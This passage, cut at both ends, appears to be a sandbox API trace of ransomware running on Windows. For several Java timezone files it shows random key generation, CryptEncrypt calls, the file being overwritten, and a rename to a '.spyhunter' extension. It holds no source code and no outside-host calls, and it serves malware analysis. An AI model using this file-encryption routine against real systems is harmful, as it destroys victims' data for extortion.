lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.735] GetProcessHeap () returned 0x2c0000 [0125.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.735] GetProcessHeap () returned 0x2c0000 [0125.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8800 | out: hHeap=0x2c0000) returned 1 [0125.735] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7a8 | out: pbBuffer=0x25cf7a8) returned 1 [0125.735] GetProcessHeap () returned 0x2c0000 [0125.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.735] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7a0*=0x30) returned 1 [0125.735] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kampala"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.737] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala") returned 58 [0125.737] StrStrW (lpFirst="Kampala", lpSrch=".txt") returned 0x0 [0125.737] GetProcessHeap () returned 0x2c0000 [0125.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.737] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf764, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf764*=0x61, lpOverlapped=0x0) returned 1 [0125.738] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.738] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x25cf764, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf764*=0x61, lpOverlapped=0x0) returned 1 [0125.739] GetProcessHeap () returned 0x2c0000 [0125.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.739] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.739] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf764, lpOverlapped=0x0 | out: lpBuffer=0x25cf7a4*, lpNumberOfBytesWritten=0x25cf764*=0x4, lpOverlapped=0x0) returned 1 [0125.739] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf764, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf764*=0x30, lpOverlapped=0x0) returned 1 [0125.739] CloseHandle (hObject=0x170) returned 1 [0125.739] GetProcessHeap () returned 0x2c0000 [0125.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.739] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala.spyhunter") returned 68 [0125.739] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kampala"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kampala.spyhunter")) returned 1 [0125.742] GetProcessHeap () returned 0x2c0000 [0125.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.742] GetProcessHeap () returned 0x2c0000 [0125.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.742] GetProcessHeap () returned 0x2c0000 [0125.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8740 | out: hHeap=0x2c0000) returned 1 [0125.742] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7a8 | out: pbBuffer=0x25cf7a8) returned 1 [0125.742] GetProcessHeap () returned 0x2c0000 [0125.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.743] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7a0*=0x30) returned 1 [0125.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\juba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.744] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba") returned 55 [0125.744] StrStrW (lpFirst="Juba", lpSrch=".txt") returned 0x0 [0125.744] GetProcessHeap () returned 0x2c0000 [0125.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.744] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf764, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf764*=0x151, lpOverlapped=0x0) returned 1 [0125.745] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffeaf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.745] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x151, lpNumberOfBytesWritten=0x25cf764, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf764*=0x151, lpOverlapped=0x0) returned 1 [0125.745] GetProcessHeap () returned 0x2c0000 [0125.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.745] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.745] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf764, lpOverlapped=0x0 | out: lpBuffer=0x25cf7a4*, lpNumberOfBytesWritten=0x25cf764*=0x4, lpOverlapped=0x0) returned 1 [0125.746] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf764, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf764*=0x30, lpOverlapped=0x0) returned 1 [0125.746] CloseHandle (hObject=0x170) returned 1 [0125.746] GetProcessHeap () returned 0x2c0000 [0125.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.746] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba.spyhunter") returned 65 [0125.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\juba"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\juba.spyhunter")) returned 1 [0125.747] GetProcessHeap () returned 0x2c0000 [0125.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.747] GetProcessHeap () returned 0x2c0000 [0125.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.747] GetProcessHeap () returned 0x2c0000 [0125.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3650 | out: hHeap=0x2c0000) returned 1 [0125.747] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7a0 | out: pbBuffer=0x25cf7a0) returned 1 [0125.747] GetProcessHeap () returned 0x2c0000 [0125.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.747] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf798*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf798*=0x30) returned 1 [0125.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\johannesburg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.748] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg") returned 63 [0125.749] StrStrW (lpFirst="Johannesburg", lpSrch=".txt") returned 0x0 [0125.749] GetProcessHeap () returned 0x2c0000 [0125.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.749] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf75c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf75c*=0x69, lpOverlapped=0x0) returned 1 [0125.749] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.749] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x25cf75c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf75c*=0x69, lpOverlapped=0x0) returned 1 [0125.750] GetProcessHeap () returned 0x2c0000 [0125.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.750] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.750] WriteFile (in: hFile=0x170, lpBuffer=0x25cf79c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf75c, lpOverlapped=0x0 | out: lpBuffer=0x25cf79c*, lpNumberOfBytesWritten=0x25cf75c*=0x4, lpOverlapped=0x0) returned 1 [0125.750] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf75c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf75c*=0x30, lpOverlapped=0x0) returned 1 [0125.750] CloseHandle (hObject=0x170) returned 1 [0125.750] GetProcessHeap () returned 0x2c0000 [0125.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.750] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg.spyhunter") returned 73 [0125.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\johannesburg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\johannesburg.spyhunter")) returned 1 [0125.751] GetProcessHeap () returned 0x2c0000 [0125.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.751] GetProcessHeap () returned 0x2c0000 [0125.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.751] GetProcessHeap () returned 0x2c0000 [0125.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba5c0 | out: hHeap=0x2c0000) returned 1 [0125.751] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7a0 | out: pbBuffer=0x25cf7a0) returned 1 [0125.751] GetProcessHeap () returned 0x2c0000 [0125.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.751] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf798*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf798*=0x30) returned 1 [0125.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\harare"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.752] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare") returned 57 [0125.752] StrStrW (lpFirst="Harare", lpSrch=".txt") returned 0x0 [0125.752] GetProcessHeap () returned 0x2c0000 [0125.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.752] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf75c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf75c*=0x41, lpOverlapped=0x0) returned 1 [0125.753] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.753] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf75c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf75c*=0x41, lpOverlapped=0x0) returned 1 [0125.753] GetProcessHeap () returned 0x2c0000 [0125.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.753] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.753] WriteFile (in: hFile=0x170, lpBuffer=0x25cf79c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf75c, lpOverlapped=0x0 | out: lpBuffer=0x25cf79c*, lpNumberOfBytesWritten=0x25cf75c*=0x4, lpOverlapped=0x0) returned 1 [0125.753] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf75c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf75c*=0x30, lpOverlapped=0x0) returned 1 [0125.753] CloseHandle (hObject=0x170) returned 1 [0125.753] GetProcessHeap () returned 0x2c0000 [0125.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.753] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare.spyhunter") returned 67 [0125.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\harare"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\harare.spyhunter")) returned 1 [0125.754] GetProcessHeap () returned 0x2c0000 [0125.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.754] GetProcessHeap () returned 0x2c0000 [0125.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.754] GetProcessHeap () returned 0x2c0000 [0125.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8680 | out: hHeap=0x2c0000) returned 1 [0125.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf798 | out: pbBuffer=0x25cf798) returned 1 [0125.754] GetProcessHeap () returned 0x2c0000 [0125.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.754] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf790*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf790*=0x30) returned 1 [0125.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\gaborone"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.755] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone") returned 59 [0125.755] StrStrW (lpFirst="Gaborone", lpSrch=".txt") returned 0x0 [0125.755] GetProcessHeap () returned 0x2c0000 [0125.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.755] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf754, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf754*=0x59, lpOverlapped=0x0) returned 1 [0125.756] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.756] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x25cf754, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf754*=0x59, lpOverlapped=0x0) returned 1 [0125.756] GetProcessHeap () returned 0x2c0000 [0125.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.757] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.757] WriteFile (in: hFile=0x170, lpBuffer=0x25cf794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf754, lpOverlapped=0x0 | out: lpBuffer=0x25cf794*, lpNumberOfBytesWritten=0x25cf754*=0x4, lpOverlapped=0x0) returned 1 [0125.757] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf754, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf754*=0x30, lpOverlapped=0x0) returned 1 [0125.757] CloseHandle (hObject=0x170) returned 1 [0125.757] GetProcessHeap () returned 0x2c0000 [0125.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.757] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone.spyhunter") returned 69 [0125.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\gaborone"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\gaborone.spyhunter")) returned 1 [0125.758] GetProcessHeap () returned 0x2c0000 [0125.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.758] GetProcessHeap () returned 0x2c0000 [0125.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.758] GetProcessHeap () returned 0x2c0000 [0125.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb85c0 | out: hHeap=0x2c0000) returned 1 [0125.758] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf798 | out: pbBuffer=0x25cf798) returned 1 [0125.758] GetProcessHeap () returned 0x2c0000 [0125.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.758] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf790*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf790*=0x30) returned 1 [0125.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\freetown"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.759] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown") returned 59 [0125.759] StrStrW (lpFirst="Freetown", lpSrch=".txt") returned 0x0 [0125.759] GetProcessHeap () returned 0x2c0000 [0125.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.760] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf754, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf754*=0x139, lpOverlapped=0x0) returned 1 [0125.760] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffec7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.760] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x139, lpNumberOfBytesWritten=0x25cf754, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf754*=0x139, lpOverlapped=0x0) returned 1 [0125.760] GetProcessHeap () returned 0x2c0000 [0125.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.761] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.761] WriteFile (in: hFile=0x170, lpBuffer=0x25cf794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf754, lpOverlapped=0x0 | out: lpBuffer=0x25cf794*, lpNumberOfBytesWritten=0x25cf754*=0x4, lpOverlapped=0x0) returned 1 [0125.761] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf754, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf754*=0x30, lpOverlapped=0x0) returned 1 [0125.761] CloseHandle (hObject=0x170) returned 1 [0125.761] GetProcessHeap () returned 0x2c0000 [0125.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.761] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown.spyhunter") returned 69 [0125.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\freetown"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\freetown.spyhunter")) returned 1 [0125.762] GetProcessHeap () returned 0x2c0000 [0125.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.762] GetProcessHeap () returned 0x2c0000 [0125.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.762] GetProcessHeap () returned 0x2c0000 [0125.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60d80 | out: hHeap=0x2c0000) returned 1 [0125.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf790 | out: pbBuffer=0x25cf790) returned 1 [0125.762] GetProcessHeap () returned 0x2c0000 [0125.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf788*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf788*=0x30) returned 1 [0125.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\el_aaiun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.763] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun") returned 59 [0125.763] StrStrW (lpFirst="El_Aaiun", lpSrch=".txt") returned 0x0 [0125.763] GetProcessHeap () returned 0x2c0000 [0125.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.763] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf74c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf74c*=0x4d, lpOverlapped=0x0) returned 1 [0125.763] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 